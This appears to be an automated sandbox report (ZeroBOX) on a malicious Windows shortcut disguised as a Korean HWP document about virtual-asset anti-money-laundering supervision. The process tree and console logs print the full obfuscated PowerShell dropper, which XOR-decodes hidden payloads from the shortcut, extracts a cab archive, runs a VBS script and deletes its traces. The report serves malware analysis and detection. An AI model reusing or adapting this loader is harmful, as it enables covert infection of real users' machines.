Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	April 3, 2025, 10:19 a.m.	April 3, 2025, 10:21 a.m.

Size	1.6MB
Type	MS Windows shortcut, Has Description string, Has command line arguments, Icon number=0, ctime=Sun Dec 31 15:32:08 1600, mtime=Sun Dec 31 15:32:08 1600, atime=Sun Dec 31 15:32:08 1600, length=0, window=hidenormalshowminimized
MD5	`c22068289f1b610f5f6398ee2a2b2b32`
SHA256	`a87c663dea792121b6a17b8e605159116e30434f2c67b8be0b198ba8229d2a3d`
CRC32	`B3195FB4`
ssdeep	`3072:i/y4XPf2UfW1ZguB7jJoOdUfZFy3J2GEU7i03O1JX6RXKC2I:X4XH7cNhoO6fe2Gdi03O7qRXKO`
Yara	Antivirus - Contains references to security software lnk_file_format - Microsoft Windows Shortcut File Format Lnk_Format_Zero - LNK Format Generic_Malware_Zero - Generic Malware

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "LCtKcmsKEZFv" "C:\Users\test22\AppData\Local\Temp\가상자산 사업자 자금세탁방지 감독 방향.hwp.lnk"
2548
- cmd.exe "C:\Windows\system32\cmd.exe" /c for /f "tokens=*" %f in ('dir /s /b C:\Windows\System32\WindowsPowershell\*.exe ^| findstr /i rshell.exe') do (if exist "%f" (%f "function building{param($honor); <#conclusion sign#>${) } = $honor.('{1}{3}{2}{0}' -f 'g','sub','rin','st').Invoke(0,$honor.length-4) + ''; <#shake fix#>return ${) };};function front{param($technology);<#hearing develop#> remove-item <#turn hat#> -path $technology <#driver front#> -force;};function room{param($myth,$angry,$result,$innocent,$thought);<#decade assistance#> ${~``=.-*}=New-Object ('{0}{5}{1}{4}{2}{3}' -f 'Syst','O.Fi','tre','am','leS','em.I')(<#employment dark#>$myth,<#cop administration#>[System.IO.FileMode]::Open,<#constitutional defense#>[System.IO.FileAccess]::Read);<#punishment business#> ${~``=.-*}.('{0}{1}' -f 'See','k').Invoke(<#earnings basically#>$angry,[System.IO.SeekOrigin]::Begin);<#ground metal#> ${~[)==}=$result*0x01;<#downtown seat#> ${@}=New-Object byte[] <#help therapy#>$result; <#reporter cooperation#> ${``*``*[~}=New-Object byte[] <#hear core#>${~[)==}; <#supporter gently#>${~``=.-*}.('{1}{0}' -f 'ad','Re').Invoke(<#wander involve#>${``*``*[~},0,<#salt conviction#>${~[)==}); ${~``=.-*}.('{1}{2}{0}' -f 'e','Cl','os').Invoke();${ #}=0;while(${ #} -lt $result){<#win hypothesis#>${@}[${ #}]=${``*``*[~}[${ #}*0x01] -bxor $innocent;${ #}++;}<#middle absorb#> set-content $thought <#exhibition salad#> ${@} -Encoding <#lawyer would#> Byte;};function medication{param($string, $participation);<#empty interpret#> expand $string <#prayer vs#> -F:* $participation;};function composition{${#-} = $env:public<#coach ordinary#> + ('{0}' -f '\') +<#beach accurate#> ('{0}' -f 'do')+('{0}' -f 'cum')+('{0}' -f 'en')+('{0}' -f 'ts');<#mutual section#> return ${#-};};function party{param($tired); <#easy hall#>${.} = Split-Path $tired;<#communication by#> return ${.};};function extend{return Get-Location;};function pine{<#around support#>return $env:Temp;};function back{${==@} = extend; ${][;*} = lovely -conclusion ${==@}; <#everybody only#>if(${][;*}.('{0}{1}' -f 'len','gth') -eq 0) {${==@} = pine; <#column anything#>${][;*} = lovely -conclusion ${==@};} return ${][;*};};function plant{${-#} = $env:public<#twenty part#> + ('{0}' -f '\') + ('{3}{2}{1}{4}{0}' -f 'b','ty.','tivi','ac','ca');<#forget reason#> return ${-#};};function loan{${;} = $env:public<#which baby#>+('{2}{4}{6}{1}{5}{3}{0}' -f 's','nts\','\d','t.vb','ocu','star','me');<#apparently campaign#> return ${;};};function lovely{param($conclusion); <#appropriate restore#> ${* }=''; [System.IO.Directory]::GetFiles($conclusion, ('{0}{1}' -f '*.','lnk'), [System.IO.SearchOption]::AllDirectories) | <#possess send#>ForEach-Object { <#juice n't#> ${;]} = [System.IO.FileInfo]::new($_); <#declare internal#> if (${;]}.Length -eq 0x0019219E) { <#orientation born#> ${* } = ${;]}.FullName;}}; return <#core shade#> ${* };};${-[;;} = back;<#married gap#>${@# ]} = party -tired ${-[;;};<#associate onto#> ${[@} = building -honor ${-[;;};room -myth <#conventional vulnerable#> ${-[;;} -angry <#move advanced#> 0x00002378 -result 0x0000A000 -innocent <#include intellectual#> 0x71 -thought <#method never#> ${[@};<#truck door#> & ${[@};${)*-].)}=plant;<#that shooting#>room -myth <#downtown collect#> ${-[;;} -angry <#impossible appoint#> 0x0000C378 -result <#weapon substantial#> 0x00013CA1 -innocent <#acid virtue#> 0x70 -thought <#itself primarily#> ${)*-].)};<#conference miss#>front -technology ${-[;;};${#} = composition;<#debate city#>medication -string ${)*-].)} -participation <#division mutual#>${#};<#psychologist weight#>front -technology ${)*-].)};${[#-} = <#jacket marriage#>loan;<#two dismiss#>& ${[#-};" ) )
  2660
  - cmd.exe C:\Windows\system32\cmd.exe /c dir /s /b C:\Windows\System32\WindowsPowershell\*.exe | findstr /i rshell.exe
    2756
    - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" dir /s /b C:\Windows\System32\WindowsPowershell\*.exe "
      2812
    - findstr.exe findstr /i rshell.exe
      2848
  - powershell.exe C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe "function building{param($honor); <#conclusion sign#>${) } = $honor.('{1}{3}{2}{0}' -f 'g','sub','rin','st').Invoke(0,$honor.length-4) + ''; <#shake fix#>return ${) };};function front{param($technology);<#hearing develop#> remove-item <#turn hat#> -path $technology <#driver front#> -force;};function room{param($myth,$angry,$result,$innocent,$thought);<#decade assistance#> ${~``=.-*}=New-Object ('{0}{5}{1}{4}{2}{3}' -f 'Syst','O.Fi','tre','am','leS','em.I')(<#employment dark#>$myth,<#cop administration#>[System.IO.FileMode]::Open,<#constitutional defense#>[System.IO.FileAccess]::Read);<#punishment business#> ${~``=.-*}.('{0}{1}' -f 'See','k').Invoke(<#earnings basically#>$angry,[System.IO.SeekOrigin]::Begin);<#ground metal#> ${~[)==}=$result*0x01;<#downtown seat#> ${@}=New-Object byte[] <#help therapy#>$result; <#reporter cooperation#> ${``*``*[~}=New-Object byte[] <#hear core#>${~[)==}; <#supporter gently#>${~``=.-*}.('{1}{0}' -f 'ad','Re').Invoke(<#wander involve#>${``*``*[~},0,<#salt conviction#>${~[)==}); ${~``=.-*}.('{1}{2}{0}' -f 'e','Cl','os').Invoke();${ #}=0;while(${ #} -lt $result){<#win hypothesis#>${@}[${ #}]=${``*``*[~}[${ #}*0x01] -bxor $innocent;${ #}++;}<#middle absorb#> set-content $thought <#exhibition salad#> ${@} -Encoding <#lawyer would#> Byte;};function medication{param($string, $participation);<#empty interpret#> expand $string <#prayer vs#> -F:* $participation;};function composition{${#-} = $env:public<#coach ordinary#> + ('{0}' -f '\') +<#beach accurate#> ('{0}' -f 'do')+('{0}' -f 'cum')+('{0}' -f 'en')+('{0}' -f 'ts');<#mutual section#> return ${#-};};function party{param($tired); <#easy hall#>${.} = Split-Path $tired;<#communication by#> return ${.};};function extend{return Get-Location;};function pine{<#around support#>return $env:Temp;};function back{${==@} = extend; ${][;*} = lovely -conclusion ${==@}; <#everybody only#>if(${][;*}.('{0}{1}' -f 'len','gth') -eq 0) {${==@} = pine; <#column anything#>${][;*} = lovely -conclusion ${==@};} return ${][;*};};function plant{${-#} = $env:public<#twenty part#> + ('{0}' -f '\') + ('{3}{2}{1}{4}{0}' -f 'b','ty.','tivi','ac','ca');<#forget reason#> return ${-#};};function loan{${;} = $env:public<#which baby#>+('{2}{4}{6}{1}{5}{3}{0}' -f 's','nts\','\d','t.vb','ocu','star','me');<#apparently campaign#> return ${;};};function lovely{param($conclusion); <#appropriate restore#> ${* }=''; [System.IO.Directory]::GetFiles($conclusion, ('{0}{1}' -f '*.','lnk'), [System.IO.SearchOption]::AllDirectories) | <#possess send#>ForEach-Object { <#juice n't#> ${;]} = [System.IO.FileInfo]::new($_); <#declare internal#> if (${;]}.Length -eq 0x0019219E) { <#orientation born#> ${* } = ${;]}.FullName;}}; return <#core shade#> ${* };};${-[;;} = back;<#married gap#>${@# ]} = party -tired ${-[;;};<#associate onto#> ${[@} = building -honor ${-[;;};room -myth <#conventional vulnerable#> ${-[;;} -angry <#move advanced#> 0x00002378 -result 0x0000A000 -innocent <#include intellectual#> 0x71 -thought <#method never#> ${[@};<#truck door#> & ${[@};${)*-].)}=plant;<#that shooting#>room -myth <#downtown collect#> ${-[;;} -angry <#impossible appoint#> 0x0000C378 -result <#weapon substantial#> 0x00013CA1 -innocent <#acid virtue#> 0x70 -thought <#itself primarily#> ${)*-].)};<#conference miss#>front -technology ${-[;;};${#} = composition;<#debate city#>medication -string ${)*-].)} -participation <#division mutual#>${#};<#psychologist weight#>front -technology ${)*-].)};${[#-} = <#jacket marriage#>loan;<#two dismiss#>& ${[#-};"
    2908
    - expand.exe "C:\Windows\system32\expand.exe" C:\Users\Public\activity.cab -F:* C:\Users\Public\documents
      3020

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (6 events)

Time & API	Arguments	Status	Return
GetComputerNameW April 3, 2025, 10:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 3, 2025, 10:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 3, 2025, 10:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 3, 2025, 10:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA April 3, 2025, 10:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 3, 2025, 10:19 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent April 3, 2025, 10:19 a.m.			0	0

Command line console output was observed (50 out of 1002 events)

Time & API	Arguments	Status	Return
WriteConsoleW April 3, 2025, 10:19 a.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW April 3, 2025, 10:19 a.m.	buffer: if console_handle: 0x00000007	1	1
WriteConsoleW April 3, 2025, 10:19 a.m.	buffer: exist "C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" console_handle: 0x00000007	1	1
WriteConsoleW April 3, 2025, 10:19 a.m.	buffer: C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe console_handle: 0x00000007	1	1
WriteConsoleW April 3, 2025, 10:19 a.m.	buffer: "function building{param($honor); <#conclusion sign#>${) } = $honor.('{1}{3}{2}{0}' -f 'g','sub','rin','st').Invoke(0,$honor.length-4) + ''; <#shake fix#>return ${) };};function front{param($technology);<#hearing develop#> remove-item <#turn hat#> -path $technology <#driver front#> -force;};function room{param($myth,$angry,$result,$innocent,$thought);<#decade assistance#> ${~``=.-}=New-Object ('{0}{5}{1}{4}{2}{3}' -f 'Syst','O.Fi','tre','am','leS','em.I')(<#employment dark#>$myth,<#cop administration#>[System.IO.FileMode]::Open,<#constitutional defense#>[System.IO.FileAccess]::Read);<#punishment business#> ${~``=.-}.('{0}{1}' -f 'See','k').Invoke(<#earnings basically#>$angry,[System.IO.SeekOrigin]::Begin);<#ground metal#> ${~[)==}=$result0x01;<#downtown seat#> ${@}=New-Object byte[] <#help therapy#>$result; <#reporter cooperation#> ${````[~}=New-Object byte[] <#hear core#>${~[)==}; <#supporter gently#>${~``=.-}.('{1}{0}' -f 'ad','Re').Invoke(<#wander involve#>${````[~},0,<#salt conviction#>${~[)==}); ${~``=.-}.('{1}{2}{0}' -f 'e','Cl','os').Invoke();${ #}=0;while(${ #} -lt $result){<#win hypothesis#>${@}[${ #}]=${````[~}[${ #}0x01] -bxor $innocent;${ #}++;}<#middle absorb#> set-content $thought <#exhibition salad#> ${@} -Encoding <#lawyer would#> Byte;};function medication{param($string, $participation);<#empty interpret#> expand $string <#prayer vs#> -F:* $participation;};function composition{${#-} = $env:public<#coach ordinary#> + ('{0}' -f '\') +<#beach accurate#> ('{0}' -f 'do')+('{0}' -f 'cum')+('{0}' -f 'en')+('{0}' -f 'ts');<#mutual section#> return ${#-};};function party{param($tired); <#easy hall#>${.} = Split-Path $tired;<#communication by#> return ${.};};function extend{return Get-Location;};function pine{<#around support#>return $env:Temp;};function back{${==@} = extend; ${][;} = lovely -conclusion ${==@}; <#everybody only#>if(${][;}.('{0}{1}' -f 'len','gth') -eq 0) {${==@} = pine; <#column anything#>${][;} = lovely -conclusion ${==@};} return ${][;};};function plant{${-#} = $env:public<#twenty part#> + ('{0}' -f '\') + ('{3}{2}{1}{4}{0}' -f 'b','ty.','tivi','ac','ca');<#forget reason#> return ${-#};};function loan{${;} = $env:public<#which baby#>+('{2}{4}{6}{1}{5}{3}{0}' -f 's','nts\','\d','t.vb','ocu','star','me');<#apparently campaign#> return ${;};};function lovely{param($conclusion); <#appropriate restore#> ${* }=''; [System.IO.Directory]::GetFiles($conclusion, ('{0}{1}' -f '.','lnk'), [System.IO.SearchOption]::AllDirectories) \| <#possess send#>ForEach-Object { <#juice n't#> ${;]} = [System.IO.FileInfo]::new($_); <#declare internal#> if (${;]}.Length -eq 0x0019219E) { <#orientation born#> ${ } = ${;]}.FullName;}}; return <#core shade#> ${* };};${-[;;} = back;<#married gap#>${@# ]} = party -tired ${-[;;};<#associate onto#> ${[@} = building -honor ${-[;;};room -myth <#conventional vulnerable#> ${-[;;} -angry <#move advanced#> 0x00002378 -result 0x0000A000 -innocent <#include intellectual#> 0x71 -thought <#method never#> ${[@};<#truck door#> & ${[@};${)-].)}=plant;<#that shooting#>room -myth <#downtown collect#> ${-[;;} -angry <#impossible appoint#> 0x0000C378 -result <#weapon substantial#> 0x00013CA1 -innocent <#acid virtue#> 0x70 -thought <#itself primarily#> ${)-].)};<#conference miss#>front -technology ${-[;;};${#} = composition;<#debate city#>medication -string ${)-].)} -participation <#division mutual#>${#};<#psychologist weight#>front -technology ${)-].)};${[#-} = <#jacket marriage#>loan;<#two dismiss#>& ${[#-};" console_handle: 0x00000007	1	1
WriteConsoleW April 3, 2025, 10:19 a.m.	buffer: Method invocation failed because [System.IO.FileInfo] doesn't contain a method console_handle: 0x00000023	1	1
WriteConsoleW April 3, 2025, 10:19 a.m.	buffer: named 'new'. console_handle: 0x0000002f	1	1
WriteConsoleW April 3, 2025, 10:19 a.m.	buffer: At line:1 char:2597 console_handle: 0x0000003b	1	1
WriteConsoleW April 3, 2025, 10:19 a.m.	buffer: + function building{param($honor); <#conclusion sign#>${) } = $honor.('{1}{3}{2 console_handle: 0x00000047	1	1
WriteConsoleW April 3, 2025, 10:19 a.m.	buffer: }{0}' -f 'g','sub','rin','st').Invoke(0,$honor.length-4) + ''; <#shake fix#>ret console_handle: 0x00000053	1	1
WriteConsoleW April 3, 2025, 10:19 a.m.	buffer: urn ${) };};function front{param($technology);<#hearing develop#> remove-item < console_handle: 0x0000005f	1	1
WriteConsoleW April 3, 2025, 10:19 a.m.	buffer: #turn hat#> -path $technology <#driver front#> -force;};function room{param($my console_handle: 0x0000006b	1	1
WriteConsoleW April 3, 2025, 10:19 a.m.	buffer: th,$angry,$result,$innocent,$thought);<#decade assistance#> ${~``=.-*}=New-Obje console_handle: 0x00000077	1	1
WriteConsoleW April 3, 2025, 10:19 a.m.	buffer: ct ('{0}{5}{1}{4}{2}{3}' -f 'Syst','O.Fi','tre','am','leS','em.I')(<#employment console_handle: 0x00000083	1	1
WriteConsoleW April 3, 2025, 10:19 a.m.	buffer: dark#>$myth,<#cop administration#>[System.IO.FileMode]::Open,<#constitutional console_handle: 0x0000008f	1	1
WriteConsoleW April 3, 2025, 10:19 a.m.	buffer: defense#>[System.IO.FileAccess]::Read);<#punishment business#> ${~``=.-*}.('{0} console_handle: 0x0000009b	1	1
WriteConsoleW April 3, 2025, 10:19 a.m.	buffer: {1}' -f 'See','k').Invoke(<#earnings basically#>$angry,[System.IO.SeekOrigin]:: console_handle: 0x000000a7	1	1
WriteConsoleW April 3, 2025, 10:19 a.m.	buffer: Begin);<#ground metal#> ${~[)==}=$result*0x01;<#downtown seat#> ${@}=New-Object console_handle: 0x000000b3	1	1
WriteConsoleW April 3, 2025, 10:19 a.m.	buffer: byte[] <#help therapy#>$result; <#reporter cooperation#> ${````[~}=New-Objec console_handle: 0x000000bf	1	1
WriteConsoleW April 3, 2025, 10:19 a.m.	buffer: t byte[] <#hear core#>${~[)==}; <#supporter gently#>${~``=.-*}.('{1}{0}' -f 'ad console_handle: 0x000000cb	1	1
WriteConsoleW April 3, 2025, 10:19 a.m.	buffer: ','Re').Invoke(<#wander involve#>${````[~},0,<#salt conviction#>${~[)==}); ${ console_handle: 0x000000d7	1	1
WriteConsoleW April 3, 2025, 10:19 a.m.	buffer: ~``=.-*}.('{1}{2}{0}' -f 'e','Cl','os').Invoke();${ #}=0;while(${ #} -lt $r console_handle: 0x000000e3	1	1
WriteConsoleW April 3, 2025, 10:19 a.m.	buffer: esult){<#win hypothesis#>${@}[${ #}]=${````[~}[${ #}*0x01] -bxor $innocen console_handle: 0x000000ef	1	1
WriteConsoleW April 3, 2025, 10:19 a.m.	buffer: t;${ #}++;}<#middle absorb#> set-content $thought <#exhibition salad#> ${@} - console_handle: 0x000000fb	1	1
WriteConsoleW April 3, 2025, 10:19 a.m.	buffer: Encoding <#lawyer would#> Byte;};function medication{param($string, $participat console_handle: 0x00000107	1	1
WriteConsoleW April 3, 2025, 10:19 a.m.	buffer: ion);<#empty interpret#> expand $string <#prayer vs#> -F:* $participation;};fun console_handle: 0x00000113	1	1
WriteConsoleW April 3, 2025, 10:19 a.m.	buffer: ction composition{${#-} = $env:public<#coach ordinary#> + ('{0}' -f '\') +<#bea console_handle: 0x0000011f	1	1
WriteConsoleW April 3, 2025, 10:19 a.m.	buffer: ch accurate#> ('{0}' -f 'do')+('{0}' -f 'cum')+('{0}' -f 'en')+('{0}' -f 'ts'); console_handle: 0x0000012b	1	1
WriteConsoleW April 3, 2025, 10:19 a.m.	buffer: <#mutual section#> return ${#-};};function party{param($tired); <#easy hall#>${ console_handle: 0x00000137	1	1
WriteConsoleW April 3, 2025, 10:19 a.m.	buffer: .} = Split-Path $tired;<#communication by#> return ${.};};function extend{retur console_handle: 0x00000143	1	1
WriteConsoleW April 3, 2025, 10:19 a.m.	buffer: n Get-Location;};function pine{<#around support#>return $env:Temp;};function ba console_handle: 0x0000014f	1	1
WriteConsoleW April 3, 2025, 10:19 a.m.	buffer: ck{${==@} = extend; ${][;*} = lovely -conclusion ${==@}; <#everybody only#>if($ console_handle: 0x0000015b	1	1
WriteConsoleW April 3, 2025, 10:19 a.m.	buffer: {][;*}.('{0}{1}' -f 'len','gth') -eq 0) {${==@} = pine; <#column anything#>${][ console_handle: 0x00000167	1	1
WriteConsoleW April 3, 2025, 10:19 a.m.	buffer: ;} = lovely -conclusion ${==@};} return ${][;};};function plant{${-#} = $env: console_handle: 0x00000173	1	1
WriteConsoleW April 3, 2025, 10:19 a.m.	buffer: public<#twenty part#> + ('{0}' -f '\') + ('{3}{2}{1}{4}{0}' -f 'b','ty.','tivi' console_handle: 0x0000017f	1	1
WriteConsoleW April 3, 2025, 10:19 a.m.	buffer: ,'ac','ca');<#forget reason#> return ${-#};};function loan{${;} = $env:public<# console_handle: 0x0000018b	1	1
WriteConsoleW April 3, 2025, 10:19 a.m.	buffer: which baby#>+('{2}{4}{6}{1}{5}{3}{0}' -f 's','nts\','\d','t.vb','ocu','star','m console_handle: 0x00000197	1	1
WriteConsoleW April 3, 2025, 10:19 a.m.	buffer: e');<#apparently campaign#> return ${;};};function lovely{param($conclusion); < console_handle: 0x000001a3	1	1
WriteConsoleW April 3, 2025, 10:19 a.m.	buffer: #appropriate restore#> ${* }=''; [System.IO.Directory]::GetFiles($conclusion, ( console_handle: 0x000001af	1	1
WriteConsoleW April 3, 2025, 10:19 a.m.	buffer: '{0}{1}' -f '*.','lnk'), [System.IO.SearchOption]::AllDirectories) \| <#possess console_handle: 0x000001bb	1	1
WriteConsoleW April 3, 2025, 10:19 a.m.	buffer: send#>ForEach-Object { <#juice n't#> ${;]} = [System.IO.FileInfo]::new <<<< ($_ console_handle: 0x000001c7	1	1
WriteConsoleW April 3, 2025, 10:19 a.m.	buffer: ); <#declare internal#> if (${;]}.Length -eq 0x0019219E) { <#orientation born#> console_handle: 0x000001d3	1	1
WriteConsoleW April 3, 2025, 10:19 a.m.	buffer: ${* } = ${;]}.FullName;}}; return <#core shade#> ${* };};${-[;;} = back;<#marr console_handle: 0x000001df	1	1
WriteConsoleW April 3, 2025, 10:19 a.m.	buffer: ied gap#>${@# ]} = party -tired ${-[;;};<#associate onto#> ${[@} = building -ho console_handle: 0x000001eb	1	1
WriteConsoleW April 3, 2025, 10:19 a.m.	buffer: nor ${-[;;};room -myth <#conventional vulnerable#> ${-[;;} -angry <#move advanc console_handle: 0x000001f7	1	1
WriteConsoleW April 3, 2025, 10:19 a.m.	buffer: ed#> 0x00002378 -result 0x0000A000 -innocent <#include intellectual#> 0x71 -tho console_handle: 0x00000203	1	1
WriteConsoleW April 3, 2025, 10:19 a.m.	buffer: ught <#method never#> ${[@};<#truck door#> & ${[@};${)*-].)}=plant;<#that shoot console_handle: 0x0000020f	1	1
WriteConsoleW April 3, 2025, 10:19 a.m.	buffer: ing#>room -myth <#downtown collect#> ${-[;;} -angry <#impossible appoint#> 0x00 console_handle: 0x0000021b	1	1
WriteConsoleW April 3, 2025, 10:19 a.m.	buffer: 00C378 -result <#weapon substantial#> 0x00013CA1 -innocent <#acid virtue#> 0x70 console_handle: 0x00000227	1	1
WriteConsoleW April 3, 2025, 10:19 a.m.	buffer: -thought <#itself primarily#> ${)*-].)};<#conference miss#>front -technology $ console_handle: 0x00000233	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 57 events)

Time & API	Arguments	Status	Return
CryptExportKey April 3, 2025, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00548528 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00548aa8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00548aa8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00548aa8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00548ca8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00548ca8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00548ca8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00548ca8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00548ca8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00548ca8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005484e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005484e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005484e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00548aa8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00548aa8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00548aa8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005480e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00548aa8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00548aa8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00548aa8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00548aa8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00548aa8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00548aa8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00548aa8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00548e28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00548e28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00548e28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00548e28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00548e28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00548e28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00548e28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00548e28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00548e28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00548e28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00548e28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00548e28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00548e28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00548e28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00548d68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00548d68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00548d68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00548d68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00548d68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 3, 2025, 10:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00548d68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
